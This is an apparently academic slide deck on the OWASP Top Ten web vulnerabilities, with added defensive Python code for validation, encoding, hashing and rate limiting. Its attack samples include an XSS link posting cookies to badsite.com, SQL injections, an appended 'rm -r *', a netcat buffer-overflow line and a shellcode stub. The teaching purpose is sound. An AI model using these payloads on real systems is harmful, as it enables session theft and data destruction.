Information Networking Security and Assurance Lab, National Chung Cheng University
Industrial Technology Research Institute, Computer & Communication Research Laboratories
The Ten Most Critical Web Application Security Vulnerabilities
Ryan J.W Chen
OWASP Top Ten Vulnerabilities
Outline
A1 Unvalidated Input
A2 Broken Access Control
A3 Broken Authentication and Session Management
A4 Cross Site Scripting (XSS) Flaws
A5 Buffer Overflows
A6 Injection Flaws
A7 Improper Error Handling
A8 Insecure Storage
A9 Denial of Service
A10 Insecure Configuration Management
Example Web Application
[Diagram: Browser (Internet) -> Web Server and Application Server (DMZ) -> Database Server (Protected Network) -> Internal Network]
Top Ten Vulnerabilities this year & last year
A1 Unvalidated Input (1/3)
An attacker can tamper with any part of an HTTP request, including the URL, query string, headers, cookies, form fields, and hidden fields.
Related attacks: A4 Cross Site Scripting, A5 Buffer Overflows, A6 Injection Flaws
A1 Unvalidated Input (2/3)
Example (SQL Injection): any malicious user can see the query string and modify it!
Original request: http://www.yoursite.com/phones/phonelist.cgi?phoneid=34
Manipulated request: http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones
Resulting query: SELECT name, phone FROM phones WHERE phoneid=34; DELETE FROM phones
What will be done?
A1 Unvalidated Input (3/3)
Countermeasures: parameters should be validated before they are used, checking:
Data type
Allowed character set
Minimum and maximum length
Whether null is allowed
Whether the parameter is required or not
Whether duplicates are allowed
Numeric range
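The checklist above applied to the slides' own phoneid parameter, as an added example that is not part of the original deck: every rule value is an assumption for this example, and the lookup also binds the value as a query parameter so the "34;delete from phones" request from A1 (2/3) (and the SQL injection case of A6) can never reach the database as SQL.

```python
import re
import sqlite3

# Constructed rules for the slide's "phoneid" parameter, one entry per checklist item.
PHONEID_RULES = {
    "type": int,                         # data type
    "charset": re.compile(r"^[0-9]+$"),  # allowed character set
    "min_len": 1, "max_len": 6,          # minimum and maximum length
    "allow_null": False,                 # whether null (empty) is allowed
    "required": True,                    # whether the parameter is required
    "allow_duplicates": False,           # whether duplicates are allowed
    "min_value": 1, "max_value": 999999, # numeric range
}

def validate_param(values, rules):
    """values: raw strings received for one parameter. Returns typed value or raises."""
    if not values:
        if rules["required"]:
            raise ValueError("parameter is required")
        return None
    if len(values) > 1 and not rules["allow_duplicates"]:
        raise ValueError("duplicate parameter")
    raw = values[0]
    if raw is None or raw == "":
        if rules["allow_null"]:
            return None
        raise ValueError("null not allowed")
    if not rules["min_len"] <= len(raw) <= rules["max_len"]:
        raise ValueError("length out of bounds")
    if not rules["charset"].match(raw):  # rejects "34;delete from phones"
        raise ValueError("illegal characters")
    value = rules["type"](raw)
    if not rules["min_value"] <= value <= rules["max_value"]:
        raise ValueError("value out of range")
    return value

def lookup_phone(conn, raw_values):
    """Validate, then bind the value so the database never sees it as SQL."""
    phoneid = validate_param(raw_values, PHONEID_RULES)
    cur = conn.execute("SELECT name, phone FROM phones WHERE phoneid = ?",
                       (phoneid,))
    return cur.fetchall()

def demo_db():
    """Constructed in-memory table matching the slide's phones example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phones (phoneid INTEGER, name TEXT, phone TEXT)")
    conn.execute("INSERT INTO phones VALUES (34, 'Alice', '555-0134')")
    return conn
```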
A2 Broken Access Control
Access Control = Authorization
Common problems:
Path traversal
File permissions that may allow access to config/password files
Client-side caching
Insecure session IDs or keys
Forced browsing past access control checks
Countermeasures: use an access control matrix to define access control rules. Administrative functions can be protected with a VPN.
A3 Broken Authentication and Session Management
Weak authentication:
Password-only
Easily guessable usernames
Unencrypted secrets that could be sniffed
Trust relationships between hosts
Countermeasures: strong passwords; account list protection; session ID protection (SSL).
A4 Cross Site Scripting (XSS) Flaws
The attacker uses a trusted application/company to send malicious code to the end user.
<a href="http://www.insecuresite.com/welcome.asp?name=
  <FORM action=http://www.badsite.com/data.asp method=post id="idForm">
    <INPUT name="cookie" type="hidden">
  </FORM>
  <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>">here</a>
"cookie robbed!!"
Source: Bo
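What the vulnerable welcome.asp does with the name parameter, next to the output-encoded version and the HttpOnly cookie flag that would leave nothing for the script to steal; this is an added example, not code from the slides, and the page markup and cookie name are assumptions.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# The slide's attacker link, constructed here as a single string.
ATTACK_URL = (
    "http://www.insecuresite.com/welcome.asp?name="
    '<FORM action=http://www.badsite.com/data.asp method=post id="idForm">'
    '<INPUT name="cookie" type="hidden"></FORM>'
    "<SCRIPT>idForm.cookie.value=document.cookie;idForm.submit();</SCRIPT>"
)

def name_from_url(url):
    """Extract the raw 'name' query parameter the way a naive CGI page would."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "name":
            return unquote_plus(value)
    return ""

def render_welcome_unsafe(name):
    """The flaw: the parameter is reflected verbatim, so the browser parses the
    attacker's FORM and SCRIPT as part of the trusted site's page."""
    return f"<html><body>Welcome, {name}</body></html>"

def render_welcome_safe(name):
    """Countermeasure: HTML-encode untrusted data at the point of output;
    '<' becomes '&lt;', so the payload is shown as text, not executed."""
    return f"<html><body>Welcome, {html.escape(name, quote=True)}</body></html>"

def session_cookie_header(session_id):
    """Second layer: an HttpOnly cookie is invisible to document.cookie, so a
    script that does get through has nothing to post to badsite."""
    return f"Set-Cookie: SESSIONID={session_id}; HttpOnly; Secure; Path=/"

def contains_active_script(page):
    """Crude check: does the page contain a real <script> tag?"""
    return "<script" in page.lower()
```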
A5 Buffer Overflows
Mostly affects web/application servers. Goal: crash the target application and get a shell.
Example:
echo "vrfy `perl -e 'print "a" x 1000'`" | nc www.targetsystem.com 25
Replace this with something like this...
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08...";
Countermeasures: keep up with bug reports; periodically scan your website; code reviews.
A6 Injection Flaws
Allows an attacker to relay malicious code through a web application to another system.
Path traversal: "../"
Adding more commands: "; rm -r *"
SQL injection: "' OR 1=1"
Countermeasures: avoid system calls (use libraries instead); validate input information; run with limited privileges.
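The two non-SQL cases on this slide (path traversal, which A2 also lists, and appended shell commands) handled as an added example rather than code from the slides: the base directory is confined with realpath, and the one external program that is still called receives an argv list instead of a shell string; the sandbox directory and the use of wc are assumptions.

```python
import os
import subprocess
import tempfile

def resolve_under(base_dir, user_path):
    """Map a user-supplied path onto base_dir and refuse anything that ends up
    outside it: "../" traversal, absolute paths, or symlinks pointing out."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    return target

def read_user_file(base_dir, user_path):
    """Serve a file only from inside the intended directory."""
    with open(resolve_under(base_dir, user_path), "rb") as fh:
        return fh.read()

def count_lines(base_dir, user_path):
    """If an external program must be called, pass an argv list and never a
    shell command string: a name like 'x; rm -r *' is then one literal
    argument (a file that does not exist), not a second command."""
    path = resolve_under(base_dir, user_path)
    result = subprocess.run(["wc", "-l", path], capture_output=True,
                            text=True, check=True)
    return int(result.stdout.split()[0])

def demo_dir():
    """Constructed sandbox for the example: base/docs/readme.txt."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "docs"))
    with open(os.path.join(base, "docs", "readme.txt"), "w") as fh:
        fh.write("line1\nline2\n")
    return base
```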
A7 Improper Error Handling
Detailed error messages help an attacker learn how to target the application.
Example: "File not found" vs. "Access denied"
Countermeasures: code review; modify the default error pages (404, 401, etc.).
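The "File not found" vs. "Access denied" distinction removed from the client-facing response while the real cause still reaches the server log, as an added example that is not from the slides; the resource table, message wording and reference-id scheme are assumptions.

```python
import logging
import uuid

log = logging.getLogger("app")

class NotFound(Exception):
    pass

class Forbidden(Exception):
    pass

# Constructed data: which user owns which resource.
RESOURCES = {"/reports/q1.pdf": "alice"}

def fetch(path, user):
    if path not in RESOURCES:
        raise NotFound(path)
    if RESOURCES[path] != user:
        raise Forbidden(f"{user} may not read {path}")
    return f"<contents of {path}>"

def handle_request(path, user):
    """Return (status, body). "File not found" and "Access denied" collapse into
    one identical response, so a probing client cannot tell whether a path
    exists; the real cause goes to the server log under a reference id that a
    genuine user can quote to support staff."""
    try:
        return 200, fetch(path, user)
    except (NotFound, Forbidden) as exc:
        ref = uuid.uuid4().hex[:8]
        log.warning("ref=%s user=%s path=%s cause=%s", ref, user, path,
                    type(exc).__name__)
        return 404, f"Resource not available (ref {ref})"
    except Exception:
        ref = uuid.uuid4().hex[:8]
        log.exception("ref=%s unhandled error user=%s path=%s", ref, user, path)
        return 500, f"Something went wrong (ref {ref})"  # never the traceback

def public_message(body):
    """Strip the per-request reference so two failure responses can be compared."""
    return body.split(" (ref ")[0]
```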
A8 Insecure Storage
Insecure storage of sensitive information:
Failure to encrypt critical data
Insecure storage of keys, certificates, and passwords
Improper storage of secrets in memory
Poor randomness
Poor choice of algorithm
Countermeasures: use a one-way hash function (SHA-1) instead of storing encrypted data. Make sure there are no open vulnerabilities in the cryptography.
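Password storage by one-way hash, with the "poor randomness" point applied to both the salt and the session identifiers of A3, as an added example that is not from the slides. The slide names SHA-1; this example uses PBKDF2-HMAC-SHA256 with a per-user salt and an iteration count, an editorial choice, and the iteration count is an assumption.

```python
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000  # assumption: raise until one hash costs ~100 ms on your hardware

def hash_password(password, salt=None):
    """Store only a salted, iterated one-way hash, never the password itself
    or a reversible encryption of it. Format: iterations$salt_hex$hash_hex."""
    salt = salt if salt is not None else os.urandom(16)  # per-user random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                 ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iterations; compare in constant time."""
    iterations, salt_hex, hash_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), hash_hex)

def new_session_id():
    """Session IDs (A3) and salts must come from the OS CSPRNG, not from
    time(), counters or random.random(); 32 bytes gives 256 bits of entropy."""
    return secrets.token_urlsafe(32)
```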
A9 Denial of Service
Legitimate users can't be served.
Exhausting the system resources
Legitimate account lockout
Countermeasures: limit the resources allocated to any user to a bare minimum. Avoid any unnecessary access to databases or other expensive resources.
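Both DoS cases on this slide in one added example (not code from the deck): a per-client sliding-window limiter that caps work before any expensive resource is touched, and a login throttle keyed on (source, account) so that bad-password floods against one account do not lock its legitimate owner out. The limits and window sizes are assumptions; the clock is injectable so the behaviour can be tested without sleeping.

```python
import time
from collections import defaultdict, deque

class SlidingWindow:
    """Count events per key within the last `window` seconds."""
    def __init__(self, limit, window, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.events = defaultdict(deque)
    def count(self, key):
        q, now = self.events[key], self.clock()
        while q and now - q[0] > self.window:
            q.popleft()           # drop events that have aged out
        return len(q)
    def exceeded(self, key):
        return self.count(key) >= self.limit
    def record(self, key):
        self.events[key].append(self.clock())
    def clear(self, key):
        self.events.pop(key, None)

class RequestLimiter:
    """Cap requests per client key (source address, session) before doing work."""
    def __init__(self, limit, window, clock=time.monotonic):
        self.win = SlidingWindow(limit, window, clock)
    def allow(self, key):
        if self.win.exceeded(key):
            return False          # reject cheaply; no database access
        self.win.record(key)
        return True

class LoginGuard:
    """Throttle failed logins per (source, account) pair instead of locking the
    account itself, so a flood against 'alice' from one address cannot lock
    Alice out from her own address."""
    def __init__(self, max_failures, window, clock=time.monotonic):
        self.win = SlidingWindow(max_failures, window, clock)
    def attempt(self, source, account, password_ok):
        key = (source, account)
        if self.win.exceeded(key):
            return "throttled"    # do not even evaluate the password
        if password_ok:
            self.win.clear(key)
            return "ok"
        self.win.record(key)
        return "denied"
```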
A10 Insecure Configuration Management
Developers ≠ web masters
Configuration problems:
Unpatched security flaws in the server software
Improper file and directory permissions
Default accounts with their default passwords
Countermeasures: configure all security mechanisms. Turn off all unused services. Set up and audit roles, permissions, and accounts. Enable logging and alerts.
Top Related